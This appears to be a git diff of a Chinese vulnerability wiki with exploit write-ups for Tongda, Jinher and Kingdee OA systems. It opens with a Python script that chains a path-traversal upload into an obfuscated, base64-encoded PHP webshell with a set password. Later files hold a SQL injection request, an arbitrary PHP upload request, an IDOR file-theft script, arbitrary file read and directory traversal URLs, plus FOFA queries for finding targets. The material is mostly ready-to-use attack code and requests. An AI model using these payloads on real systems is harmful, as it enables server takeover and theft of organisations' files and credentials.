data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0icGVpcWkuaW5pIgpDb250ZW50LVR5cGU6IHRleHQvcGxhaW4KCmF1dG9fcHJlcGVuZF9maWxlPXBlaXFpLmxvZwotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3VibWl0IgoK5o+Q5LqkCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTc1MTgzMjM5ODY1NDg5OTI5NTE5ODQwNTcxMDQtLQ==")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user \033[0m".format(target_url))
if "档案已保存" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 成功上传.user.ini文件, \033[0m".format(target_url))
POC_2(target_url, Cookie)
else:
print("\033[31m[x] 目标 {} 上传.user.ini文件失败\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_2(target_url, Cookie):
vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/peiqi"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
"Connection": "close",
"Cookie": Cookie,
"Upgrade-Insecure-Requests": "1",
}
data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0icGVpcWkubG9nIgpDb250ZW50LVR5cGU6IHRleHQvcGxhaW4KCjw/cGhwIAplY2hvICJQZWlRaV9XaWtpIjsKJGZPZ1Q9Y3JlYXRlX2Z1bmN0aW9uKGJhc2U2NF9kZWNvZGUoJ0pBPT0nKS5jaHIoMTE0MTk1Lzk5Mykuc3RyX3JvdDEzKCdiJykuc3RyX3JvdDEzKCd6JykuY2hyKDcwOC02MDcpLGNocigweGM2MGUvMHgxZjYpLmJhc2U2NF9kZWNvZGUoJ2RnPT0nKS5zdHJfcm90MTMoJ24nKS5jaHIoMzkwLTI4MikuY2hyKDB4MWFlLTB4MTg2KS5jaHIoMHgzYWMtMHgzODgpLmNocigweGQ1NjEvMHgxZGIpLmJhc2U2NF9kZWNvZGUoJ2J3PT0nKS5iYXNlNjRfZGVjb2RlKCdiUT09JykuYmFzZTY0X2RlY29kZSgnWlE9PScpLnN0cl9yb3QxMygnKScpLmNocig3OTgtNzM5KSk7JGZPZ1QoYmFzZTY0X2RlY29kZSgnT1RNMk4nLidETTNPMCcuJ0JsZGtGJy4nc0tDUmYnLicnLnN0cl9yb3QxMygnSCcpLnN0cl9yb3QxMygnUicpLmNocig0MTM4Mi83MjYpLnN0cl9yb3QxMygnRycpLmJhc2U2NF9kZWNvZGUoJ1ZnPT0nKS4nJy4nJy5iYXNlNjRfZGVjb2RlKCdSZz09Jykuc3RyX3JvdDEzKCdnJykuc3RyX3JvdDEzKCdEJykuYmFzZTY0X2RlY29kZSgnV2c9PScpLmNocigyMzc1MS8yNzMpLicnLidsUmFWMCcuJ3BPekk0Jy4nTURrek0nLidURTcnLicnKSk7Pz4KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InN1Ym1pdCIKCuaPkOS6pAotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0LS0K")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/peiqi \033[0m".format(target_url))
if "档案已保存" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 成功上传 peiqi.log 文件, \033[0m".format(target_url))
POC_3(target_url, Cookie)
else:
print("\033[31m[x] 目标 {} 上传 peiqi.log 文件失败\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_3(target_url, Cookie):
vuln_url = target_url + "/general/reportshop/workshop/report/attachment-remark/form.inc.php?"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Cookie": Cookie,
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 {}/general/reportshop/workshop/report/attachment-remark/form.inc.php? \033[0m".format(target_url))
if "PeiQi_Wiki" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 存在漏洞,响应中包含 PeiQi_Wiki \033[0m".format(target_url))
print("\033[32m[o] 成功上传蚁剑木马 密码为: PeiQi \n[o] webshell路径: {}/general/reportshop/workshop/report/attachment-remark/form.inc.php?\033[0m".format(target_url))
else:
print("\033[31m[x] 目标 {} 不存在漏洞,响应中不包含 PeiQi_Wiki\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
Cookie = "PHPSESSID=ug4ip8ohugo61bmu399npplep5; USER_NAME_COOKIE=admin; OA_USER_ID=admin"
POC_1(target_url, Cookie)
```
![image-20220209112120203](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091121379.png)

99
OA产品漏洞/通达OA v11.9 upsharestatus 后台SQL注入漏洞.md Normal file
View File

@ -0,0 +1,99 @@
# 通达OA v11.9 upsharestatus 后台SQL注入漏洞
## 漏洞描述
通达OA v11.9 及以下版本中由于某些参数过滤不完善导致后台存在SQL注入漏洞
## 漏洞影响
```
通达OA <= v11.9
```
## 环境搭建
```plain
https://cdndown.tongda2000.com/oa/2019/TDOA11.9.exe
```
双击安装
![image-20220209112211968](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091122432.png)
## 漏洞复现
漏洞文件位 **webroot/general/appbuilder/modules/portal/controllers/WorkbenchController.php**
```php
public function actionUpsharestatus()
{
Yii::$app->response->format = yii\web\Response::FORMAT_JSON;
$data = modules\appdesign\models\AppUtils::toGBK($_POST);
if (modules\portal\controllers\intval($data["uid"]) == $_SESSION["LOGIN_UID"]) {
modules\portal\models\PortalWorkbench::updateAll(array("state" => "{$data["status"]}"), "id={$data["id"]}");
}
else if ($data["status"] == 1) {
modules\portal\models\PortalWorkbenchState::deleteAll(array("wids" => "{$data["id"]}", "uid" => "{$_SESSION["LOGIN_UID"]}"));
}
else {
$Work = new modules\portal\models\PortalWorkbenchState();
$Work->wids = $data["id"];
$Work->uid = $_SESSION["LOGIN_UID"];
$Work->save();
}
$dataBack = array("status" => 1, "msg" => modules\portal\controllers\_("操作成功"));
$dataBack = modules\appdesign\models\AppUtils::toUTF8($dataBack);
return $dataBack;
}
```
![image-20220209112228111](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091122220.png)
其中 **updateAll()** 函数并没有使用防止 SQL注入的 **sql_injection()** 来防止注入
**webroot/inc/conn.php**
![image-20220209112245130](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091122281.png)
所以这里就出现了 id 参数存在注入的情况,请求包如下
```plain
POST /general/appbuilder/web/portal/workbench/upsharestatus HTTP/1.1
Host: oa.tongda2000.com
Connection: close
Content-Length: 36
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Origin: https://oa.tongda2000.com
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://oa.tongda2000.com/general/appbuilder/web/portal/workbench/upsharestatus
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: __root_domain_v=.tongda2000.com; SID_12=5ea03399; USER_NAME_COOKIE=chenqiang; Hm_lvt_7cbefde9059536a2b96aaafc134d625c=1617014067,1617196083; _qddaz=QD.677915359373668; PHPSESSID=nso4iqhvp2qi464eoavk2fn0c0; OA_USER_ID=chenqiang; SID_15=ded66d80; LAST_OPERATION_TIME=1617242241
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
uid=15&status=1&id=1;select sleep(4)
```
注意 uid参数 要为当前用户的uid才能完成请求可以使用 burp 遍历查看时间响应
例如这里使用官网的测试账户 uid 遍历出为 15
![image-20220209112303802](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091123903.png)
如果uid错误则不会出现时间延迟将请求包放入 Sqlmap跑一下
![image-20220209112326082](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091123191.png)

66
OA产品漏洞/通达OA v2017 action_upload.php 任意文件上传漏洞.md Normal file
View File

@ -0,0 +1,66 @@
## 漏洞描述
通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞
## 漏洞影响
```
通达OA v2017
```
## FOFA
```
app="TDXK-通达OA"
```
## 漏洞复现
访问获取版本信息
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091053148.png)
发送请求包上传任意文件
```php
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 893
Content-Type: multipart/form-data; boundary=---------------------------55719851240137822763221368724
X_requested_with: XMLHttpRequest
Accept-Encoding: gzip
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileFieldName]"
ffff
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"
1000000000
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[filePathFormat]"
tcmd
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"
.php
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="mufile"
submit
-----------------------------55719851240137822763221368724--
```
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091053293.png)
再访问上传的文件
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091053249.png)

71
OA产品漏洞/通达OA 部分漏洞信息整合.md Normal file
View File

@ -0,0 +1,71 @@
# 通达OA 部分漏洞信息整合
## 通达OA信息收集
```plain
http[s]://TongDaOA.domain/inc/expired.php 判断通达版本
http[s]://TongDaOA.domain/inc/reg_trial.php
http[s]://TongDaOA.domain/inc/reg_trial_submit.php
http[s]://TongDaOA.domain/ispirit/retrieve_pwd.php
GET 参数username、email 可爆用户、邮箱
http[s]://TongDaOA.domain/resque/worker.php 计算机名
```
## 2013-2017(SQLi path)
```plain
http[s]://TongDaOA.domain/module/crm2010/imageOperation/deleteImage.php
http[s]://TongDaOA.domain/module/crm2010/product/type_tree.php
http[s]://TongDaOA.domain/module/crm2010/select/getData.php
http[s]://TongDaOA.domain/module/crm2010/select/getValue.php
http[s]://TongDaOA.domain/module/crm2010/select/index.php
http[s]://TongDaOA.domain/module/crm2010/share/update.php
http[s]://TongDaOA.domain/portal/webportals/source/oa/news.php
http[s]://TongDaOA.domain/portal/webportals/source/oa/notify.php?LOGIN_USER_ID=
http[s]://TongDaOA.domain/task/crm/account_care_remind.php
http[s]://TongDaOA.domain/task/crm/action_link_remind.php
http[s]://TongDaOA.domain/task/crm/contract_birthday_remind.php
http[s]://TongDaOA.domain/task/crm/contract_near_remind.php
http[s]://TongDaOA.domain/task/crm/contract_remind.php
http[s]://TongDaOA.domain/task/crm/crm_account_contact_bir_remind.php
http[s]://TongDaOA.domain/task/crm/crm_complain_remind.php
http[s]://TongDaOA.domain/task/crm/crm_opportunity_status_remind.php
http[s]://TongDaOA.domain/task/crm/crm_salepay_remind.php
http[s]://TongDaOA.domain/task/crm/crm_stockout_remind.php
http[s]://TongDaOA.domain/task/crm/marketing_near_remind.php
http[s]://TongDaOA.domain/task/crm/order_to_stockout_remind.php
http[s]://TongDaOA.domain/task/crm/payment_near_remind.php
http[s]://TongDaOA.domain/task/crm/storage_near_remind.php
http[s]://TongDaOA.domain/ispirit/myoa.php
http[s]://TongDaOA.domain/ispirit/retrieve_pwd.php
```
## v11~v11.6 [0day]
```plain
http[s]://TongDaOA.domain/general/approve_center/list/roll_config.inc.php
http[s]://TongDaOA.domain/general/bi_design/reportshop/report_bi.func.php
http[s]://TongDaOA.domain/general/data_center/console/autocode/autocode.php
http[s]://TongDaOA.domain/general/data_center/model_design/console/autocode/autocode.php
http[s]://TongDaOA.domain/general/data_center/model_design/design/report/action.php
http[s]://TongDaOA.domain/general/reportshop/design/report/action.php
http[s]://TongDaOA.domain/general/project/portal/details/budget/table.php
http[s]://TongDaOA.domain/general/reportshop/design/report/console/autocode/autocode.php
http[s]://TongDaOA.domain/general/reportshop/workshop/report/attachment-remark/form3.php
http[s]://TongDaOA.domain/general/system/user/get_key_user_info.php
http[s]://TongDaOA.domain/general/workflow/list/roll_config.inc.php
http[s]://TongDaOA.domain/interface/GetNewAPP.php
http[s]://TongDaOA.domain/interface/GetNewAPP1.php
http[s]://TongDaOA.domain/general/workflow/plugin/turn/kd_k3_applly/kd_k3_applly.php
http[s]://TongDaOA.domain/general/workflow/document_list/roll_config.inc.php
```
## v11.6 [RCE]
```plain
http[s]://TongDaOA.domain/module/appbuilder/assets/print.php 任意文件删除
```
## 参考文章
[通达OA漏洞一些漏洞点(Github)](https://github.com/OA-HUNTER/TongDa-OA.git)

37
OA产品漏洞/金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞.md Normal file
View File

@ -0,0 +1,37 @@
# 金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞
## 漏洞描述
金和OA C6 存在越权信息泄露漏洞普通用户登录后可以通过遍历ID编号获取管理员及其他用户的敏感信息
## 漏洞影响
```
金和OA C6
```
## FOFA
```
app="Jinher-OA"
```
## 漏洞复现
使用普通用户登录 OA应用后台
访问的POC为
```plain
http://xxx.xxx.xxx.xxx/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=RY120330
```
- 注意 RY120330 需要为确定的其他的用户编号
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090135010.png)
泄露了部分的敏感信息
## 参考文章
https://mp.weixin.qq.com/s/gwHQVIZeMWfT8a5lBX_4WA

145
OA产品漏洞/金和OA C6 OpenFile.aspx 后台越权敏感文件遍历漏洞.md Normal file
View File

@ -0,0 +1,145 @@
# 金和OA C6 OpenFile.aspx 后台越权敏感文件遍历漏洞
## 漏洞描述
金和OA C6 存在后台越权敏感文件遍历漏洞,普通用户通过遍历特殊参数可以获取其他用户上传的敏感文件
## 漏洞影响
```
金和OA C6
```
## FOFA
```
app="Jinher-OA"
```
## 漏洞复现
默认用户口令admin/000000
登录后点击信息交流,发起协同页面
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090137424.png)
上传附件并上传发送给目标
- 这里登录权限为管理员,我们自己发给自己就好,前文只是展现漏洞挖掘思路过程
![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090137965.png)
成功收到上传的附件
![3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090138862.png)
点击查看时抓包发现一个带有文件ID的请求包
![4](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090138285.png)
返回了几个参数
```plain
var strFilePath = '../Resource/slaves/1/8b473ecb-7b39-4384-ada2-b0ec72c4f6ed.png';
var strFileType = 'png';
var strSid='3jvpvhs410m2wdbbficax5q5';
var strFileIDCode='us9w7xWE7do=';
var strId = '1229';
var strTxtReg = 'txt,ini,xml,config,htm,html,js,css,asp,aspx,jsp,cs,sql,inf,htc,log';
var strImgReg = 'jpg,gif,jpeg,png,ico';
var MD = '';
```
其中我们注意到 strFilePath 为文件的存储地址,我们更改 id参数为另一个值且测试后发现 name文件名参数无关紧要
![5](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090138702.png)
更改ID后发送请求包发现获得另一个文件的信息
访问Url注意 **type参数** 需要为正确的文件后缀才可以访问
```plain
http://xxx.xxx.xxx.xxx/C6/control/OpenFile.aspx?id=1200&name=&type=pdf
```
![6](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090138950.png)
这里更换一个普通用户测试是否可行,尝试遍历 id
![7](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090138469.png)
![8](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090139653.png)
存在 **strFilePath参数** 则是存在文件,为空则是文件已经不存在
同时抓包下载文件页面也可以看到可获取的参数
**FileID 与 FileIDCode**
![9](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090139235.png)
于是只需要通过刚刚的ID遍历获取两个关键参数就能下载其他人发送的敏感文件且只需要普通用户权限
## 漏洞POC
- POC只检测是否存在漏洞且漏洞存在于后台需要登录
- 运行后访问链接即可下载文件
```python
import requests
import sys
import random
import re
import base64
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 金和OA C6 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url, file_id, cookie):
vuln_url = target_url + "/C6/control/OpenFile.aspx?id={}&name=&type=pdf".format(file_id)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded",
"Cookie":cookie
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在请求 Url: {}\033[0m".format(vuln_url))
if "strFilePath =" in response.text and response.status_code == 200:
strFilePath = re.findall(r"var strFilePath = '(.*?)';", response.text)[0]
strFileType = strFilePath[-3:]
strFileIDCode = re.findall(r"var strFileIDCode='(.*?)';", response.text)[0]
strId = re.findall(r"var strId = '(.*?)';", response.text)[0]
sid = re.findall(r'ASP.NET_SessionId=(.*?);', cookie)[0]
if strFilePath != "":
print("\033[36m[o] 目标 {} 存在漏洞, 获取文件信息:\n[o] 文件路径:{}\n[o] 文件类型:{}\n[o] 文件ID code{}\n[o] 文件编号: {}\033[0m".format(target_url, strFilePath, strFileType,strFileIDCode, strId ))
print("\033[32m[o] 文件下载链接为: {}/C6/JHSoft.Web.CustomQuery/uploadFileDownLoad.aspx?Decrypt=&FileID={}&FileIDCode={}&sid={}".format(target_url, strId, strFileIDCode, sid))
else:
print("\033[31m[x] 目标 {} 文件不存在 \033[0m".format(target_url))
else:
print("\033[31m[x] 目标 {} 不存在漏洞 \033[0m".format(target_url))
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
file_id = str(input("\033[35mFile_id >>> \033[0m"))
cookie = str(input("\033[35mCookie >>> \033[0m"))
POC_1(target_url, file_id, cookie)
```
![10](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090139356.png)

131
OA产品漏洞/金和OA C6 download.jsp 任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,131 @@
# 金和OA C6 download.jsp 任意文件读取漏洞
## 漏洞描述
金和OA C6 download.jsp文件存在任意文件读取漏洞攻击者通过漏洞可以获取服务器中的敏感信息
## 漏洞影响
```
金和OA
```
## FOFA
```
app="Jinher-OA"
```
## 漏洞复现
登录页面如下
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090141493.png)
漏洞文件为 download.asp
```java
<%
Response.Buffer = true
Response.Clear
dim url
Dim fso,fl,flsize
dim Dname
Dim objStream,ContentType,flName,isre,url1
'*********************************************调用时传入的下载文件名
Dname=trim(request("filename"))
'******************************************************************
If Dname<>"" Then
'******************************下载文件存放的服务端目录
url=server.MapPath(Dname)
'url=server.MapPath("./")&"\Jhsoft.Web.module\testbill\dj"&Dname '这边做了一下改动By Fanshui
'***************************************************
End If
'Response.write url
'response.end
Set fso=Server.CreateObject("Scripting.FileSystemObject")
Set fl=fso.getfile(url)
flsize=fl.size
flName=fl.name
Set fl=Nothing
Set fso=Nothing
'Response.write flName
'Response.write flsize
%>
<%
Set objStream = Server.CreateObject("ADODB.Stream")
'objStream.Mode   =   3  
objStream.Type = 1
objStream.Open
objStream.LoadFromFile url
Select Case lcase(Right(flName, 4))
Case ".asf"
ContentType = "video/x-ms-asf"
Case ".avi"
ContentType = "video/avi"
Case ".doc"
ContentType = "application/msword"
Case ".zip"
ContentType = "application/zip"
Case ".xls"
ContentType = "application/vnd.ms-excel"
Case ".gif"
ContentType = "image/gif"
Case ".jpg", "jpeg"
ContentType = "image/jpeg"
Case ".wav"
ContentType = "audio/wav"
Case ".mp3"
ContentType = "audio/mpeg3"
Case ".mpg", "mpeg"
ContentType = "video/mpeg"
Case ".rtf"
ContentType = "application/rtf"
Case ".htm", "html"
ContentType = "text/html"
Case ".txt"
ContentType = "text/plain"
Case Else
ContentType = "application/octet-stream"
End Select
Response.AddHeader "Content-Disposition", "attachment; filename=" & flName
Response.AddHeader "Content-Length", flsize
Response.Charset = "UTF-8"
Response.ContentType = ContentType
Response.BinaryWrite objStream.Read
Response.Flush
response.Clear()
objStream.Close
Set objStream = Nothing
%>
```
请求的POC为
```plain
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
```
![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090141014.png)
读取 web.config
```plain
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
```
![3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090141775.png)

39
OA产品漏洞/金蝶OA server_file 目录遍历漏洞.md Normal file
View File

@ -0,0 +1,39 @@
# 金蝶OA server_file 目录遍历漏洞
## 漏洞描述
金蝶OA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息
## 漏洞影响
```
金蝶OA
```
## FOFA
```
app="Kingdee-EAS"
```
## 漏洞复现
登录界面为
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090144781.png)
漏洞POC
```plain
/appmonitor/protected/selector/server_file/files?folder=/&suffix=
# Windows服务器
appmonitor/protected/selector/server_file/files?folder=C://&suffix=
# Linux服务器
appmonitor/protected/selector/server_file/files?folder=/&suffix=
```
![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090144057.png)